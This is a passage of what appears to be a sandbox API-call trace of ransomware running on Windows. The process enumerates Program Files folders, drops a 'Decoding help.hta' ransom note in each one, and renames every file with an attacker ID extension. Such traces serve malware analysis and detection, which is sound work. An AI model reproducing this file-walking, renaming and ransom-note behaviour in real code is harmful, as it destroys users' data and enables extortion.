Files\\Windows Journal\\jnwmon.dll") returned="\\\\?\\C:\\Program Files\\Windows Journal\\jnwmon.dll" [0039.712] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\jnwmon.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\jnwmon.dll") returned="\\\\?\\C:\\Program Files\\Windows Journal\\jnwmon.dll" [0039.712] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\jnwmon.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\jnwmon.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Journal\\jnwmon.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.712] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Journal\\jnwmon.dll" (normalized: "c:\\program files\\windows journal\\jnwmon.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Journal\\jnwmon.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows journal\\jnwmon.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.712] FindNextFileW (in: hFindFile=0x5a55b0, lpFindFileData=0x8f4fd30 | out: lpFindFileData=0x8f4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x757cd2ce, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x757cd2ce, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x2b0b6020, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x6c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="jnwppr.dll", cAlternateFileName="")) returned 1 [0039.712] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" [0039.712] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned 40 [0039.712] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Decoding help.hta" [0039.712] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Decoding help.hta" (normalized: "c:\\program files\\windows journal\\decoding help.hta")) returned 0x1 [0039.713] lstrcmpiW (lpString1="Decoding help.hta", lpString2="jnwppr.dll") returned -1 [0039.713] lstrlenW (lpString="jnwppr.dll") returned 10 [0039.713] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" [0039.713] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned 40 [0039.713] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\", lpString2="jnwppr.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\jnwppr.dll") returned="\\\\?\\C:\\Program Files\\Windows Journal\\jnwppr.dll" [0039.713] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\jnwppr.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\jnwppr.dll") returned="\\\\?\\C:\\Program Files\\Windows Journal\\jnwppr.dll" [0039.713] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\jnwppr.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\jnwppr.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Journal\\jnwppr.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.713] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Journal\\jnwppr.dll" (normalized: "c:\\program files\\windows journal\\jnwppr.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Journal\\jnwppr.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows journal\\jnwppr.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.713] FindNextFileW (in: hFindFile=0x5a55b0, lpFindFileData=0x8f4fd30 | out: lpFindFileData=0x8f4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1a4bf5a, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb1a4bf5a, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb1abe37b, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x210600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Journal.exe", cAlternateFileName="")) returned 1 [0039.713] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" [0039.713] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned 40 [0039.713] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Decoding help.hta" [0039.713] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Decoding help.hta" (normalized: "c:\\program files\\windows journal\\decoding help.hta")) returned 0x1 [0039.713] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Journal.exe") returned -1 [0039.713] lstrlenW (lpString="Journal.exe") returned 11 [0039.713] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" [0039.713] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned 40 [0039.713] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\", lpString2="Journal.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Journal.exe") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Journal.exe" [0039.713] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\Journal.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Journal.exe") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Journal.exe" [0039.713] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Journal.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Journal.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Journal.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.713] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Journal.exe" (normalized: "c:\\program files\\windows journal\\journal.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Journal.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows journal\\journal.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.713] FindNextFileW (in: hFindFile=0x5a55b0, lpFindFileData=0x8f4fd30 | out: lpFindFileData=0x8f4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97b92e68, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x97b92e68, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x36740f70, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xa3400, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSPVWCTL.DLL", cAlternateFileName="")) returned 1 [0039.713] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" [0039.714] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned 40 [0039.714] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Decoding help.hta" [0039.714] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Decoding help.hta" (normalized: "c:\\program files\\windows journal\\decoding help.hta")) returned 0x1 [0039.714] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MSPVWCTL.DLL") returned -1 [0039.714] lstrlenW (lpString="MSPVWCTL.DLL") returned 12 [0039.714] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" [0039.714] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned 40 [0039.714] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\", lpString2="MSPVWCTL.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\MSPVWCTL.DLL") returned="\\\\?\\C:\\Program Files\\Windows Journal\\MSPVWCTL.DLL" [0039.714] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\MSPVWCTL.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\MSPVWCTL.DLL") returned="\\\\?\\C:\\Program Files\\Windows Journal\\MSPVWCTL.DLL" [0039.714] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\MSPVWCTL.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\MSPVWCTL.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Journal\\MSPVWCTL.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0039.714] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Journal\\MSPVWCTL.DLL" (normalized: "c:\\program files\\windows journal\\mspvwctl.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Journal\\MSPVWCTL.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows journal\\mspvwctl.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.723] FindNextFileW (in: hFindFile=0x5a55b0, lpFindFileData=0x8f4fd30 | out: lpFindFileData=0x8f4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d0a2fff, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x8d0a2fff, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x43278e40, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x1a6e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="NBDoc.DLL", cAlternateFileName="")) returned 1 [0039.723] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" [0039.723] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned 40 [0039.723] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Decoding help.hta" [0039.723] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Decoding help.hta" (normalized: "c:\\program files\\windows journal\\decoding help.hta")) returned 0x1 [0039.723] lstrcmpiW (lpString1="Decoding help.hta", lpString2="NBDoc.DLL") returned -1 [0039.723] lstrlenW (lpString="NBDoc.DLL") returned 9 [0039.723] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" [0039.723] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned 40 [0039.723] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\", lpString2="NBDoc.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\NBDoc.DLL") returned="\\\\?\\C:\\Program Files\\Windows Journal\\NBDoc.DLL" [0039.723] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\NBDoc.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\NBDoc.DLL") returned="\\\\?\\C:\\Program Files\\Windows Journal\\NBDoc.DLL" [0039.723] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\NBDoc.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\NBDoc.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Journal\\NBDoc.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0039.723] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Journal\\NBDoc.DLL" (normalized: "c:\\program files\\windows journal\\nbdoc.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Journal\\NBDoc.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows journal\\nbdoc.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.739] FindNextFileW (in: hFindFile=0x5a55b0, lpFindFileData=0x8f4fd30 | out: lpFindFileData=0x8f4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x743456ac, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x743456ac, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x43278e40, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xf600, dwReserved0=0x0, dwReserved1=0x0, cFileName="NBMapTIP.dll", cAlternateFileName="")) returned 1 [0039.739] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" [0039.739] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned 40 [0039.739] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Decoding help.hta" [0039.739] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Decoding help.hta" (normalized: "c:\\program files\\windows journal\\decoding help.hta")) returned 0x1 [0039.739] lstrcmpiW (lpString1="Decoding help.hta", lpString2="NBMapTIP.dll") returned -1 [0039.739] lstrlenW (lpString="NBMapTIP.dll") returned 12 [0039.739] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" [0039.739] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned 40 [0039.739] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\", lpString2="NBMapTIP.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\NBMapTIP.dll") returned="\\\\?\\C:\\Program Files\\Windows Journal\\NBMapTIP.dll" [0039.739] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\NBMapTIP.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\NBMapTIP.dll") returned="\\\\?\\C:\\Program Files\\Windows Journal\\NBMapTIP.dll" [0039.739] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\NBMapTIP.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\NBMapTIP.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Journal\\NBMapTIP.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.739] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Journal\\NBMapTIP.dll" (normalized: "c:\\program files\\windows journal\\nbmaptip.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Journal\\NBMapTIP.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows journal\\nbmaptip.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.740] FindNextFileW (in: hFindFile=0x5a55b0, lpFindFileData=0x8f4fd30 | out: lpFindFileData=0x8f4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78d0fadc, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x78d0fadc, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xec410110, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0xc800, dwReserved0=0x0, dwReserved1=0x0, cFileName="PDIALOG.exe", cAlternateFileName="")) returned 1 [0039.740] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" [0039.740] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned 40 [0039.740] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Decoding help.hta" [0039.740] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Decoding help.hta" (normalized: "c:\\program files\\windows journal\\decoding help.hta")) returned 0x1 [0039.740] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PDIALOG.exe") returned -1 [0039.740] lstrlenW (lpString="PDIALOG.exe") returned 11 [0039.740] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" [0039.740] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned 40 [0039.740] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\", lpString2="PDIALOG.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\PDIALOG.exe") returned="\\\\?\\C:\\Program Files\\Windows Journal\\PDIALOG.exe" [0039.740] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\PDIALOG.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\PDIALOG.exe") returned="\\\\?\\C:\\Program Files\\Windows Journal\\PDIALOG.exe" [0039.740] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\PDIALOG.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\PDIALOG.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Journal\\PDIALOG.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.740] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Journal\\PDIALOG.exe" (normalized: "c:\\program files\\windows journal\\pdialog.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Journal\\PDIALOG.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows journal\\pdialog.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.765] FindNextFileW (in: hFindFile=0x5a55b0, lpFindFileData=0x8f4fd30 | out: lpFindFileData=0x8f4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e472dd2, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa250a38, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e4e551f, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0039.765] lstrcmpW (lpString1=".", lpString2="Templates") returned -1 [0039.765] lstrcmpW (lpString1="..", lpString2="Templates") returned -1 [0039.765] lstrcmpiW (lpString1="windows", lpString2="Templates") returned 1 [0039.765] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\*.*" [0039.765] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\*.*") returned 40 [0039.765] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\", lpString2="Templates" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates" [0039.765] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*" [0039.765] GlobalMemoryStatus (in: lpBuffer=0x8f4fd10 | out: lpBuffer=0x8f4fd10) [0039.765] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5f60fb8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e0 [0039.775] CloseHandle (hObject=0x1e0) returned 1 [0039.775] FindNextFileW (in: hFindFile=0x5a55b0, lpFindFileData=0x8f4fd30 | out: lpFindFileData=0x8f4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e472dd2, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa250a38, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e4e551f, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 0 [0039.776] FindClose (in: hFindFile=0x5a55b0 | out: hFindFile=0x5a55b0) returned 1 Thread: id = 93 os_tid = 0xba8 [0039.668] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Mail\\*.*", lpFindFileData=0x908fd30 | out: lpFindFileData=0x908fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eb25fda, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5570 [0039.699] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.699] FindNextFileW (in: hFindFile=0x5a5570, lpFindFileData=0x908fd30 | out: lpFindFileData=0x908fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eb25fda, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.699] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.699] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.699] FindNextFileW (in: hFindFile=0x5a5570, lpFindFileData=0x908fd30 | out: lpFindFileData=0x908fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ecb743, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0039.699] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0039.700] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0039.700] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0039.700] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Mail\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Mail\\*.*" [0039.700] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Mail\\*.*") returned 37 [0039.700] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\en-US") returned="\\\\?\\C:\\Program Files\\Windows Mail\\en-US" [0039.700] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Mail\\en-US\\*.*" [0039.700] GlobalMemoryStatus (in: lpBuffer=0x908fd10 | out: lpBuffer=0x908fd10) [0039.700] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5eb8ce0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x184 [0039.708] CloseHandle (hObject=0x184) returned 1 [0039.708] FindNextFileW (in: hFindFile=0x5a5570, lpFindFileData=0x908fd30 | out: lpFindFileData=0x908fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7065be1, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa7065be1, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa70b1ea1, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1fbe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="msoe.dll", cAlternateFileName="")) returned 1 [0039.708] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Mail\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Mail\\*.*" [0039.708] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Mail\\*.*") returned 37 [0039.709] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Mail\\Decoding help.hta" [0039.709] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Mail\\Decoding help.hta" (normalized: "c:\\program files\\windows mail\\decoding help.hta")) returned 0xffffffff [0039.709] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Mail\\Decoding help.hta" (normalized: "c:\\program files\\windows mail\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0039.709] WriteFile (in: 